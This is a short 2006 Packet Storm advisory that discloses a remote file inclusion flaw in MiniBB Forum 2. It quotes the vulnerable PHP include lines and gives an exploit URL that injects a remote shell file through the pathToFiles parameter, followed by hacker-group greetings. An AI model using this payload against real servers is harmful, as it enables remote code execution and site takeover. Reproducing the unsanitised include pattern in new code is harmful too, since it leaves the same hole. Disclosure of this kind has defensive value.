minibb2-rfi.txt

🗓️ 14 Nov 2006 00:00:00Reported by ThE-LoRd-Of-CrAcKiNgType

packetstorm🔗 packetstormsecurity.com👁 24 Views

MiniBB Forum <= 2 Remote File Include (index.php) // Vulnerability in MiniBB forum version 2 allows remote file inclusio

`Title : MiniBB Forum <= 2 Remote File Include (index.php)  
########################################################################  
#######  
  
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}  
  
------------------------------------------------------------------------  
Sorce Code:  
http://www.minibb.net/download.php?file=minibb20  
-----  
  
Affected software description :  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : MiniBB Forum 2 (index.php)version :  
version [ 2 ]  
exploit :Remote File Include  
------------------------------------------------------------------------  
-----  
Vulnerable Code:  
include ($pathToFiles.'setup_'.$DB.'.php');  
include ($pathToFiles.'bb_cookie.php');  
include ($pathToFiles.'bb_functions.php');  
include ($pathToFiles.'bb_specials.php');  
----------------------------------------------------------------------  
Exploit:  
http://www.VicTim.com/[Script_Path]/index.php?pathToFiles=Shell.txt?  
  
  
  
------------------------------------------------------------------------  
----  
  
greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco  
  
Special Greeting:AsbMay's Group  
  
channel:www.asb-may.net  
  
contact:spoonman500[at]hotmail[dot]com  
  
_________________________________________________________________  
MSN Hotmail sur i-mode : envoyez et recevez des e-mails depuis votre   
téléphone portable ! http://www.msn.fr/hotmailimode/  
  
`

14 Nov 2006 00:00Current

7.4High risk

Vulners AI Score7.4

minibb forum // remote file include // security vulnerability // php // code inclusion // cybersecurity